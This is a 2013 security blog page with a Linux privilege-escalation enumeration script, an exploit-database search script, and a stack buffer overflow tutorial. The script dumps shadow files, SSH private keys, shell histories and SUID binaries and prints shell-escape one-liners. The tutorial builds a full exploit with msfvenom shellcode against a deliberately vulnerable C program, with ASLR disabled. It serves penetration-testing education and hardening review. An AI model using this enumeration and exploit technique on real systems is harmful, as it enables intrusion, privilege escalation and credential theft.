Monday, December 23, 2013

Linux Privilege Escalation Script



#!/bin/sh
#
#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'
#                   bmmmd' 
#                  
#
# Local enumeration checklist for a Linux host.
#
# Takes no arguments.  Prints the question list (#>01 .. #>39) and then,
# for each item, runs the listed read-only commands (cat/ls/find/ps/
# netstat/...) and writes their output to stdout.  Almost nothing is
# redirected, so missing files and tools that are distribution-specific
# (rpm, dpkg, chkconfig, netstat, lsof, lpstat) report errors on stderr;
# run with 2>/dev/null when the output is to be kept.
#
# The same questions drive a hardening review: world-writable paths,
# setuid/setgid binaries, readable private keys, credentials in config
# files and cron jobs editable by non-root users are findings whichever
# side of the assessment you are on.
#
# Known quirks (noted again inline): #>28-#>31 have their headings
# commented out although two of their find commands still run; #>34 and
# #>35 are listed in the checklist but have no section; several lines
# contain literal placeholders ([filename], /dir) or typos and fail.
echo "-[Linux Privilege Escalation Script by 1N3]=--"
echo "-[http://treadstonesecurity.blogspot.com]=--"
echo ""
echo "#>01 Whats the distribution type? What version?"
echo "#>02 What's the Kernel version? Is it 64-bit?"
echo "#>03 What can be learnt from the environmental variables?"
echo "#>04 Is there a printer?"
echo "#>05 What services are running? Which service has which user"
echo "#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!"
echo "#>07 What applications are installed? What version are they? Are they currently running?"
echo "#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?"
echo "#>09 What jobs are scheduled?"
echo "#>10 Any plain text usernames and/or passwords?"
echo "#>11 What NIC(s) does the system have? Is it connected to another network?"
echo "#>12 What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?"
echo "#>13 Whats cached? IP and/or MAC addresses"
echo "#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?"
echo "#>15 What sensitive files can be found?"
echo "#>16 Anything interesting in the home directorie(s)? If its possible to access"
echo "#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords"
echo "#>18 What has the user being doing? Is there any password in plain text? What have they been edting?"
echo "#>19 What user information can be found?"
echo "#>20 Can private-key information be found?"
echo "#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?"
echo "#>22 What can be found in /var/?"
echo "#>23 Any settings/files (hidden) on website? Any settings file with database information?"
echo "#>24 Is there anything in the log file(s) (Could help with Local File Includes!)"
echo "#>25 If commands are limited, you break out of the jail shell?"
echo "#>26 How are file-systems mounted?"
echo "#>27 Are there any unmounted file-systems?"
echo "#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here"
echo "#>29 SGID (chmod 2000) - run as the  group, not the user who started it."
echo "#>30 SUID (chmod 4000) - run as the  owner, not the user who started it."
echo "#>31 SGID or SUID"
echo "#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm"
echo "#>33 world-writeable folders"
echo "#>34 world-writeable & executable folders"
echo "#>35 Any problem files? Word-writeable, nobody files"
echo "#>36 world-writeable files"
echo "#>37 Noowner files"
echo "#>38 What development tools/languages are installed/supported?"
echo "#>39 How can files be uploaded?"
echo ""
echo ""
echo ""
# #>01  Distribution and release: /etc/issue plus any /etc/*-release file.
echo "#>01 Whats the distribution type? What version?"
echo "#####################################################################"
cat /etc/issue
cat /etc/*-release
echo ""
# #>02  Kernel version and architecture from /proc, uname, the RPM database
#       (RPM-based systems only), dmesg and the kernel images in /boot.
echo "#>02 What's the Kernel version? Is it 64-bit?"
echo "#####################################################################"
cat /proc/version 
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
echo ""
# #>03  System-wide and per-user shell start-up files, then the exported
#       environment (env) and every shell variable of this script's own
#       shell (set) - the latter is long and includes the script's state.
echo "#>03 What can be learnt from the environmental variables?"
echo "#####################################################################"
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
echo ""
# #>04  CUPS/LP print queues.
echo "#>04 Is there a printer?"
echo "#####################################################################"
lpstat -a
echo ""
# #>05  Listening TCP/UDP sockets with owning PID and user where visible,
#       the process table, and /etc/service - this looks like a typo for
#       /etc/services, the file #>12 actually greps.
echo "#>05 What services are running? Which service has which user"
echo "#####################################################################"
netstat -tulnpe
ps -ef
cat /etc/service
echo ""
echo "Listing all running processes..."
ps -auxxx
echo ""
# #>06  Every ps line containing "root" - matches the user column, but also
#       any command line that happens to contain the word.
echo "#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!"
echo "#####################################################################"
ps aux | grep root
echo ""
# #>07  Installed packages from dpkg and rpm, plus the package caches.  The
#       trailing "O" on the apt path looks like a typo, so that ls fails.
echo "#>07 What applications are installed? What version are they? Are they currently running?"
echo "#####################################################################"
#ls -alh /usr/bin/
#ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
echo ""
# #>08  Common service configs read verbatim.  The final ls/awk prints
#       every /etc entry whose mode string contains an "r", which is
#       nearly all of them - it is a listing, not a filter.
echo "#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?"
echo "#####################################################################"
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
echo ""
# #>09  Scheduled jobs: the caller's crontab, spool directories, the
#       /etc/cron* files and directories, at/cron allow and deny lists.
echo "#>09 What jobs are scheduled?"
echo "#####################################################################"
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
echo ""
# #>10  NOTE: "[filename]" is a literal placeholder, not a shell
#       expansion, so the three greps report "No such file" as written.
#       In the Joomla line "$password" sits inside double quotes, so the
#       shell expands it (normally to nothing) and the pattern searched
#       is just "var ".
echo "#>10 Any plain text usernames and/or passwords?"
echo "#####################################################################"
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla
echo ""
# #>11  Interfaces and the Debian/RHEL-style static network configs.
echo "#>11 What NIC(s) does the system have? Is it connected to another network?"
echo "#####################################################################"
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
echo ""
# #>12  Resolver, hosts, ARP cache, interfaces, netfilter rules, names;
#       then open sockets (lsof/netstat), SysV service run levels
#       (chkconfig, RPM-based systems) and login history (last, w).
echo "#>12What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?"
echo "#####################################################################"
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
cat /etc/hosts
arp
ifconfig -a
iptables -L
hostname
dnsdomainname
echo ""
echo "What other users & hosts are communicating with the system?"
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
echo ""
# #>13  ARP cache and routing table.
echo "#>13 Whats cached? IP and/or MAC addresses"
echo "#####################################################################"
arp -e
route
/sbin/route -nee
echo ""
# #>14  Identity and sessions.  "cut -d:" has no -f field list and exits
#       with an error; the two awk lines both list UID-0 accounts.
echo "#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?"
echo "#####################################################################"
id
who
w
last
cat /etc/passwd | cut -d:    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
echo ""
# #>15  Account databases and the mail spool listing.
echo "#>15 What sensitive files can be found?"
echo "#####################################################################"
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
echo ""
# #>16  Recursive listing of every home directory the caller can read.
echo "#>16 Anything interesting in the home directorie(s)? If its possible to access"
echo "#####################################################################"
ls -ahlR /root/
ls -ahlR /home/
echo ""
# #>17  Candidate credential files read verbatim, then a recursive grep
#       for "pass" in /etc and the web root.  The bare "*" in both egrep
#       lines expands against the current working directory, so whatever
#       files are there are searched too.
echo "#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords"
echo "#####################################################################"
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
egrep -i pass * -Rn /etc/
egrep -i pass * -Rn /var/www/
echo ""
# #>18  Shell and tool history files of the current user.
echo "#>18 What has the user being doing? Is there any password in plain text? What have they been edting?"
echo "#####################################################################"
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
echo ""
# #>19  Profile files and root's mailbox (two common locations).
echo "#>19 What user information can be found?"
echo "#####################################################################"
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
echo ""
# #>20  SSH user keys, client/server config and host keys.  Any private
#       key (no .pub suffix) that an unprivileged caller can read is a
#       finding in its own right.
echo "#>20 Can private-key information be found?"
echo "#####################################################################"
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
echo ""
# #>21  Despite the heading, "-user $USER" selects files OWNED by the
#       current user, not files writable by them; $USER is unquoted.
echo "#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?"
echo "#####################################################################"
find /etc -user $USER
echo ""
# #>22  Listings under /var and the DHCP client lease file.
echo "#>22 What can be found in /var/?"
echo "#####################################################################"
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
echo ""
# #>23  Recursive listings of the usual web document roots.
echo "#>23 Any settings/files (hidden) on website? Any settings file with database information?"
echo "#####################################################################"
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
echo ""
# #>24  The individual log reads are commented out; only the /var/log
#       listing runs.
echo "#>24 Is there anything in the log file(s) (Could help with Local File Includes!)"
echo "# http://www.thegeekstuff.com/2011/08/linux-var-log-files/"
echo "#####################################################################"
#cat /etc/httpd/logs/access_log
#cat /etc/httpd/logs/access.log
#cat /etc/httpd/logs/error_log
#cat /etc/httpd/logs/error.log
#cat /var/log/apache2/access_log
#cat /var/log/apache2/access.log
#cat /var/log/apache2/error_log
#cat /var/log/apache2/error.log
#cat /var/log/apache/access_log
#cat /var/log/apache/access.log
#cat /var/log/auth.log
#cat /var/log/chttp.log
#cat /var/log/cups/error_log
#cat /var/log/dpkg.log
#cat /var/log/faillog
#cat /var/log/httpd/access_log
#cat /var/log/httpd/access.log
#cat /var/log/httpd/error_log
#cat /var/log/httpd/error.log
#cat /var/log/lastlog
#cat /var/log/lighttpd/access.log
#cat /var/log/lighttpd/error.log
#cat /var/log/lighttpd/lighttpd.access.log
#cat /var/log/lighttpd/lighttpd.error.log
#cat /var/log/messages
#cat /var/log/secure
#cat /var/log/syslog
#cat /var/log/wtmp
#cat /var/log/xferlog
#cat /var/log/yum.log
#cat /var/run/utmp
ls -alh /var/log/*
echo ""
# #>25  Prints three reminder strings as text; nothing here is executed.
echo "#>25 If commands are limited, you break out of the jail shell?"
echo "#####################################################################"
echo "python -c 'import pty;pty.spawn("/bin/bash")'"
echo "echo os.system('/bin/bash')"
echo "/bin/sh -i"
echo ""
# #>26  Mounted file systems and free space.
echo "#>26 How are file-systems mounted?"
echo "#####################################################################"
mount
df -h
echo ""
# #>27  Static mount table (entries here that are absent from "mount"
#       above are the unmounted ones).
echo "#>27 Are there any unmounted file-systems?"
echo "#####################################################################"
cat /etc/fstab
echo ""
# #>28-#>31  Headings and most variants are commented out, but the two
#       find commands after them still run without a heading.  The first
#       spawns one ls per regular file on the system and filters the mode
#       string for setuid/setgid bits (slow on large trees).  The second
#       uses "-perm +6000", the old GNU syntax that current findutils
#       rejects in favour of "-perm /6000", and is not error-redirected.
#echo "#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here"
#find / -perm -1000 -type d 2>/dev/null   
#echo "#>29 SGID (chmod 2000) - run as the  group, not the user who started it."
#find / -perm -g=s -type f 2>/dev/null   
#echo "#>30 SUID (chmod 4000) - run as the  owner, not the user who started it."
#find / -perm -u=s -type f 2>/dev/null
#echo "#>31 SGID or UID"
#find / -perm -g=s -o -perm -u=s -type f -exec ls -l {} \; 2>/dev/null   
#for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f -exec ls -l {} \; 2>/dev/null; done
#find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
find / -type f -exec ls -l {} \; 2> /dev/null | egrep -i  "rwsr|rwxr-sr"
find / -perm +6000 -type f -exec ls -ld {} \;
#echo ""
# The next find's expression begins with "-o", which find rejects as a
# syntax error; with stderr silenced it therefore prints nothing at all.
# The find after it mixes an exact-mode test (-perm 02000, only files whose
# mode is exactly 2000) with an all-bits test (-perm -04000).
echo "SUID OR GUID Writable files..."
echo "#####################################################################"
find / -o -group `id -g` -perm -g=w -perm -u=s \
 -o -perm -o=w -perm -u=s \
 -o -perm -o=w -perm -g=s \
 -ls 2>/dev/null 
find / -perm 02000 -o -perm -04000 2>/dev/null
echo ""
# #>32  Two commands were fused onto one line: everything after "mount -l"
#       is handed to mount as arguments, so neither the mount listing nor
#       the writable-path search runs as intended.  The quotes around
#       $HOME and /proc are typographic (“ ”), not shell quotes.
echo "#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm"
echo "#####################################################################"
mount -l find / -path “$HOME” -prune -o -path “/proc” -prune -o \( ! -type l \) \( -user `id -u` -perm -u=w  -o -group `id -g` -perm -g=w  -o -perm -o=w \) -ls 2>/dev/null
echo ""
# #>33  Directories with the other-write bit set.
echo "#>33 world-writeable folders"
echo "#####################################################################"
find / -perm -o+w -type d -exec ls -lh {} \; 2>/dev/null   
echo ""
# #>36  Regular files with the other-write bit set (#>34 and #>35 from the
#       checklist have no section).
echo "#>36 world-writeable files"
echo "#####################################################################"
find / -perm -o+w -type f -exec ls -lh {} \; 2> /dev/null
# #>37  "/dir" is a literal placeholder; find fails until a real path is
#       substituted.  -nouser/-nogroup select files whose numeric owner or
#       group has no entry in passwd/group.
echo "#>37 Noowner files"
echo "#####################################################################"
find /dir -xdev \( -nouser -o -nogroup \) -print  
echo ""
# #>38  Compilers and interpreters on PATH.  "which" is not POSIX and its
#       output format varies; "command -v" is the portable equivalent.
echo "#>38 What development tools/languages are installed/supported?"
echo "#####################################################################"
which perl
which gcc
which g++
which python
which php
which cc
echo ""
# #>39  File-transfer clients on PATH (same "which" caveat as #>38).
echo "#>39 How can files be uploaded?"
echo "#####################################################################"
which wget
which nc
which netcat
which scp
which ftp
which tftp
echo ""
echo "#####################################################################"
echo "#####################################################################"
echo "Done!"

Findsploit Script


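#!/bin/bash
# Findsploit 20131223 by 1N3
#
#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'
#                   bmmmd' 
#                          
#
#
# ABOUT
# Findsploit is a simple bash script to quickly and easily search both local and online exploit databases. Currently searches Metasploit, Exploit-db, Google, CVE's, SecurityFocus, 1337day and OSVDB.

# REQUIREMENTS
# This script relies on exploitdb's searchsploit script and files in /pentest/exploits/exploitdb

# INSTALLATION
# 1. Copy the script to /usr/bin
# 2. Run chmod +rx /usr/bin/findsploit
# 3. To run, type findsploit <name of product> <version> <local/remote>
#
# ARGUMENTS
# $1  product name   - used as a case-insensitive regular expression over the
#                      local Metasploit module tree, as the first searchsploit
#                      term and in every web query
# $2  version        - optional; extra searchsploit term / web query word
# $3  local/remote   - optional; extra searchsploit term / web query word
#
# Every term is quoted, so a term containing spaces stays one argument.
# The terms are NOT URL-encoded: characters such as '&', '#' or '+' in a
# term change the meaning of the generated URLs.
#
# EXIT STATUS
# 1 when no search term is given (usage printed), 0 otherwise.

clear

VAR1=$1
VAR2=$2
VAR3=$3

if [ -z "$VAR1" ]; then
  echo "(--==== findsploit by nonXero ====---)"
  echo "(--==== Usage: findsploit windows xp remote, etc. ====--)"
  echo "(--==== http://treadstonesecurity.blogspot.com ====--)"
  exit 1
fi

echo "(--==== findsploit by nonXero ====---)"
echo "(--==== http://treadstonesecurity.blogspot.com ====--)"
echo ""
echo "(--==== METASPLOIT EXPLOITS"
echo ""
# "--" stops a term that begins with "-" from being parsed as a grep option.
egrep -i -R -- "$VAR1" /opt/metasploit/apps/pro/msf3/modules/exploits/* | grep "Name"
echo ""
echo "(--==== EXPLOITDB EXPLOITS"
echo ""
# Pass only the terms that were actually supplied, each as a single argument
# (the unquoted original silently dropped empty ones and split terms on spaces).
terms=()
for term in "$VAR1" "$VAR2" "$VAR3"; do
  [ -n "$term" ] && terms+=("$term")
done
/pentest/exploits/exploitdb/searchsploit "${terms[@]}"
echo ""
# read returns on a full line, so it is Enter - not any key - that continues.
echo "(--==== Press Enter to search online or Ctrl+C to exit..."
read -r _
firefox "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=${VAR1}&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=" 2>/dev/null
firefox "https://www.google.ca/search?q=${VAR1}+${VAR2}+${VAR3}+exploit" 2>/dev/null
firefox "http://www.cvedetails.com/product-search.php?vendor_id=0&search=${VAR1}" 2>/dev/null
firefox "https://www.google.ca/search?q=${VAR1}+${VAR2}+${VAR3}+exploit+site:www.securityfocus.com" 2>/dev/null
firefox "https://www.google.ca/search?q=${VAR1}+${VAR2}+${VAR3}+site:www.1337day.com" 2>/dev/null
firefox "http://www.osvdb.org/search?search[vuln_title]=${VAR1}&search[text_type]=titles" 2>/dev/null

exit 0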

Friday, November 29, 2013

Linux Buffer Overflow Tutorial

LINUX BUFFER OVERFLOW TUTORIAL BY 1N3

                          

      `7MN.   `7MF'       
 __,    MMN.    M         
`7MM    M YMb   M  pd""b. 
  MM    M  `MN. M (O)  `8b
  MM    M   `MM.M      ,89
  MM    M     YMM    ""Yb.
.JMML..JML.    YM       88
                  (O)  .M'
                   bmmmd' 
                          

# OVERVIEW
This tutorial covers the basics of exploiting buffer overflows on Linux x86 platforms. Tested on BackTrack 5R3 Linux 3.2.6 i686 GNU/Linux.




# CREATE A VULNERABLE C APP THAT ACCEPTS USER INPUT WITH A TOTAL BUFFER OF 100 BYTES BUT NO BOUNDS CHECKING...

########################## test.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Deliberately vulnerable demo target for the walk-through above.
 *
 * argv[1] is copied into a fixed 100-byte stack buffer with strcpy(),
 * which copies up to the terminating NUL and never checks the destination
 * size.  An argument of 100 bytes or more therefore writes past buff into
 * the rest of the stack frame; the gdb sessions below show the saved EBP
 * and the return address being overwritten at input offsets 108 and 112.
 * A bounded copy - snprintf(buff, sizeof buff, "%s", argv[1]), or rejecting
 * any argv[1] with strlen(argv[1]) >= sizeof buff - is the fix; the page
 * compiles with -fno-stack-protector and -z execstack so that no mitigation
 * masks the defect.
 *
 * printf(), exit() and strcpy() need <stdio.h>, <stdlib.h> and <string.h>;
 * without those headers they are implicitly declared, which current
 * compilers warn about or reject.
 *
 * Returns 1 on the success path (0 is the conventional value) and exits
 * with status 0 on the usage-error path.
 */
int main(int argc, char *argv[])
{
    char buff[100];                 /* fixed-size destination, not initialised */
    if(argc <2)
    {
        printf("Syntax: %s <input string>\n", argv[0]);
        exit (0);                   /* usage error, yet reports success */
    }
    strcpy(buff, argv[1]);          /* no length check: this is the overflow */
    return 1;
}

# COMPILING 
gcc test.c -fno-stack-protector -z execstack -o test.o

# DISABLE ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) SO THE STACK ADDRESSES SEEN IN GDB STAY THE SAME BETWEEN RUNS
echo 0 > /proc/sys/kernel/randomize_va_space

# DEBUG THE APPLICATION
gdb test.o

(gdb) disass main
Dump of assembler code for function main:
   0x08048454 <+0>:    push   %ebp
   0x08048455 <+1>:    mov    %esp,%ebp
   0x08048457 <+3>:    and    $0xfffffff0,%esp
   0x0804845a <+6>:    add    $0xffffff80,%esp
   0x0804845d <+9>:    cmpl   $0x1,0x8(%ebp)
   0x08048461 <+13>:    jg     0x8048484 <main+48>
   0x08048463 <+15>:    mov    0xc(%ebp),%eax
   0x08048466 <+18>:    mov    (%eax),%eax
   0x08048468 <+20>:    mov    %eax,0x4(%esp)
   0x0804846c <+24>:    movl   $0x8048570,(%esp)
   0x08048473 <+31>:    call   0x8048374 <printf@plt>
   0x08048478 <+36>:    movl   $0x0,(%esp)
   0x0804847f <+43>:    call   0x8048384 <exit@plt>
   0x08048484 <+48>:    mov    0xc(%ebp),%eax
   0x08048487 <+51>:    add    $0x4,%eax
   0x0804848a <+54>:    mov    (%eax),%eax
   0x0804848c <+56>:    mov    %eax,0x4(%esp)
   0x08048490 <+60>:    lea    0x1c(%esp),%eax
   0x08048494 <+64>:    mov    %eax,(%esp)
   0x08048497 <+67>:    call   0x8048364 <strcpy@plt>
   0x0804849c <+72>:    mov    $0x1,%eax
   0x080484a1 <+77>:    leave
   0x080484a2 <+78>:    ret   
End of assembler dump.

# SET BREAKPOINTS
(gdb) break *0x08048497
Breakpoint 1 at 0x8048497
(gdb) break *0x0804849c
Breakpoint 2 at 0x804849c
(gdb) break *0x080484a1
Breakpoint 3 at 0x80484a1

# FUZZ THE APPLICATION, OVERWRITE THE BUFFER AND CHECK IF ANY REGISTERS ARE OVERWRITTEN...
(gdb) r "`perl -e 'print "A"x120'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "A"x120'`"
Breakpoint 1, 0x08048497 in main ()

# REGISTERS BEFORE USER INPUT
(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x85b7641f    -2051578849
edx            0x2    2
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x8048497    0x8048497 <main+67>
eflags         0x200286    [ PF SF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

Breakpoint 2, 0x0804849c in main ()
(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x804849c    0x804849c <main+72>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

# CHECK EAX REGISTER FOR A's (0x41)...
(gdb) x/16xb $eax
0xbffff72c:    0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff734:    0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41

Breakpoint 3, 0x080484a1 in main ()
(gdb) info registers
eax            0x1    1
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x80484a1    0x80484a1 <main+77>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

(gdb) step
Single stepping until exit from function main,
which has no line number information.
Warning:
Cannot insert breakpoint 0.
Error accessing memory address 0x41414141: Input/output error.

0x41414141 in ?? ()
(gdb)

# EBP AND EIP ARE OVERWRITTEN WITH A'S (0x41414141)
(gdb) info registers
eax            0x1    1
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff7a0    0xbffff7a0
ebp            0x41414141    0x41414141
esi            0x0    0
edi            0x0    0
eip            0x41414141    0x41414141
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)


# Find which bytes of the input overwrite EIP and EBP. Restore EBP to the value it had before the buffer was copied, and point EIP at the start of the buffer (the address held in EAX)...

# Target value for EIP: the buffer address held in EAX prior to user input
EIP 0xbffff72c

# EBP prior to user input
EBP  0xbffff798


# CREATE UNIQUE PATTERN TO FIND EIP/EBP OVERWRITE...
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 120
[*] exec: ruby pattern_create.rb 120
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9



# FUZZ TEST.C WITH UNIQUE PATTERN TO FIND REGISTER OFFSET VALUES
(gdb) r "`perl -e 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"'`"
Breakpoint 1, 0x08048497 in main ()

(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x72698d95    1919520149
edx            0x2    2
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x8048497    0x8048497 <main+67>
eflags         0x200286    [ PF SF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

Program received signal SIGSEGV, Segmentation fault.
0x64413764 in ?? ()
(gdb)


# FIND EIP OFFSET
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 64413764
[*] exec: ruby pattern_offset.rb 64413764
[*] Exact match at offset 112


# FIND EBP OFFSET
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 41366441
[*] exec: ruby pattern_offset.rb 41366441
[*] Exact match at offset 108


# CREATE SHELLCODE USING METASPLOIT TO RUN THE LINUX COMMAND 'whoami'...
msf exploit(ms06_040_netapi) > msfvenom -p linux/x86/exec CMD=whoami -b "x00" -e x86/shikata_ga_nai

[*] x86/shikata_ga_nai succeeded with size 69 (iteration=1)
buf =
"\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9" +
"\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28" +
"\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad" +
"\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51" +
"\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36"

# EIP LITTLE ENDIAN
EIP 0xbffff72c
\x2c\xf7\xff\xbf

# EBP LITTLE ENDIAN
EBP  0xbffff798
\x98\xf7\xff\xbf


# CONSTRUCT BUFFER/EXPLOIT
total buff = 116
EIP = 4
EBP = 4
shellcode = 69
noops = 39


buffer = noops + shellcode + noops + ebp + eip
/================================================\
||116 *** 19 ****** 69 ******* 20 ***** 4 **** 4||
\================================================/

# RUN EXPLOIT...
(gdb) r "`perl -e 'print "\x90"x19, "\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36", "\x90"x20, "\x98\xf7\xff\xbf", "\x2c\xf7\xff\xbf"'`"
